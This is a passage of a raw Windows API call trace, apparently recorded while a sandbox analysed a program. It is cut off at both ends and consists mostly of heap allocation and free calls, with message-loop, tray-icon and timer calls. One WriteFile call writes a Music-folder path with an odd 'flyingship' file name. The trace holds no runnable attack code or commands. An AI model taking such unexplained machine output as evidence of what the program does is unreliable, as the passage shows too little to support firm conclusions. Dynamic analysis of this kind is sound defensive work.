lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 59 [0188.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.425] WriteFile (in: hFile=0x160, lpBuffer=0x8db2e8*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db2e8*, lpNumberOfBytesWritten=0x87f43c*=0x3a, lpOverlapped=0x0) returned 1 [0188.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.426] CloseHandle (hObject=0x160) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.427] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 1 [0188.427] TranslateMessage (lpMsg=0x87f5c4) returned 0 [0188.427] DispatchMessageW (lpMsg=0x87f5c4) returned 0x0 [0188.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.427] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ec60) returned 1 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.429] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0188.429] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0188.429] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.429] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.431] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.431] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.431] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.431] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0188.432] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.436] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: 